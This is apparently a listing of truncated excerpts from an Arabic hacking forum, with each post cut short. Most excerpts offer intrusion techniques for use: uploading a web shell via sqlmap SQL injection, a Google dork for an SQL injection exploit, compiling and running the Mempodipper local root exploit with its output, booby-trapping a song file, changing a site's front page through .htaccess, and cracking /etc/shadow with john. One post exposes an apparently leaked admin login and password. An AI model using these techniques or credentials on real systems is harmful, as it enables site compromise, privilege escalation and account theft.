السلام عليكم
لنفرض انت على اليوزر spiral وسحبت كونفق الهدف على اليوزر jordan
تيجي تحاول تتصل بالقاعدة او تحاول رفع اندكس من اي سكربت ما يقبل ويجيك الآتي:
Access denied for user 'spiral_jordan'@'localhost' (using password: YES)
الحل يا عزيزي انك تتصل بالسيرفر عكسي بإحدى طرق...
السلام عليكم
رفع شيل عن طريق ثغرات sql باستخدام اداة sqlmap
هذه الخاصية موجودة في اداة sqlmap وشفتها مشروحة في منتدى اجنبي وحبيتها اشرحها لكم
ندخل في الشرح على طول
اولا: نفتح موجة الأوامر ونذهب للمسار التالي عن طريق الأمر
cd /pentest/database/sqlmap
ثانيا: نطبق الأمر التالي
./sqlmap.py...
السلام عليكم
بعد انقطاع فترة كبيرة حبيت ارجعلكم بثغرة قوية من اكتشافي
####
# Exploit Title: Free Hosting Manager V2.0 SQL Injection Vulnerability
# Author: Spiral
# E-mail: for-hacker@hotmail.com
# Google Dork: inurl:clients/packages.php?id=1
# Tested on: ***91;Windows 7***93;
# Vendor...
السلام عليكم
الدورك في في جوجل
by am4ss
بعد الرابط اكتب
admincp
اليوزر: aler t@am4ss.com
الباس: kawkawa
لكن شيل الفراغ في اليوزر بسبب التشفير في منتدى العناكب
السلام عليكم
هذا الشرح لفتح بورت في مودم Livebox والشرح بسيط من دون صور او فيديو
1- ادخل الى صفحة المودم وضع اليوزر والباسوورد http://192.168.1.1
2- بعد الدخول اضغط على LAN server
3- اضغط على Add
4- * Server name : اكتب اسم البرنامج او اي شي
* Access activated : خليها Yes
* Protocol ...
Hi all ...
This is a new local root wich working for >=2.6.39 kernals ..
Such as 3.0.0-15
Usr@H4x0r~/Desktop$ gcc CVE-2012-0056-Mempodipper.c -o CVE-2012-0056-Mempodipper
Usr@H4x0r~/Desktop$ ./CVE-2012-0056-Mempodipper
===============================
= Mempodipper =
=...
السلام عليكم
اذهب إلى المسار التالي:
C:\windows\system32\drivers\etc
وابحث عن ملف اسمه:
Hosts
قم بفتح هذا الملف بالمفكرة واضف رابط الموقع بعد الاي بي الخاص به
مثال:
ip www.name.com
ثم قم بحفظ الملف
سلام عليكم
الســــلام عليكم شباب ..
اليوم نزل ريموت جديد للإصدار المصاب 2.6.x وبصراحة الظاهر قوي جدا .. ولاكن الترجمة شوية غلبتني وإن شاء الله بنزله خلال كم ساعه بلكثير ...
Linux Kernel 2.6.x SCTP FWD Memory COrruption Remote Exploit
http://www.milw0rm.org/exploits/8556
اللحين لنعرف كيف الريموت...
الســـــلام عليكم شباب ...
ظهرت ثغره قوية البارحة للPhpMyAdmin بلميل وورم مع انه صعب وجود اي ثغره فعاله كPoC/exploit لبرنامج مفتوح المصدر وشهير جدا ك PhpMyAdmin .
والجميل بلثغره انه مازالت امكانية وجود ثغرات ريموت كومند ( remote command execution ) او هيب اوفر فلو ( heap overflow ) او حتى...
بسم الله الرحمن الرحيم
شرح تلغيم أغنية
ندخل على اي موقع اغاني ونعمل كلك يمين ثم حفظ الهدف باسم ..
نخزنها على الجهاز
نفتح الاغنية بواسطة المفكرة
الآن موضح كما في الصورة
لآن نحفظها بامتداد ram طبعا
جميع الحقوق محفوظة
..::: Crew 1337 Mind :::..
تحياتي للجميع
DR JORDANIAN
بسم الله الرحمن الرحيم
الموضوع هو اذا كنت تملك شيل على موقع
ولم يكن تصريح للتعديل على الصفحة الرئيسية أو تصريح لرفع ملف او حذفه داخل المجلد
لكن اذا كان ملف .hatccess مصرح ، فبإمكانك التعديل على الصفحة الرئيسية
كل ما عليك التعديل على ملف .hatccess ووضع هذا الكود فيه:
DirectoryIndex هذا...
السلام عليكم
يعتبر برنامج john من أقوى البرامج لفك الكلمات السرية
التي تكون في ملف
/etc/shadowفي أنظمة ليونكس
لتثبيت البرنامج على ليونكس قم بتحميل البرنامج
من هــــــــــنــــــــــا
ثم فك الضغك
tar xzvf john-1.7.0.2.tar.gzادخل المجلد السورس الموجود داخل المجلد john-1.7.0.2
cd...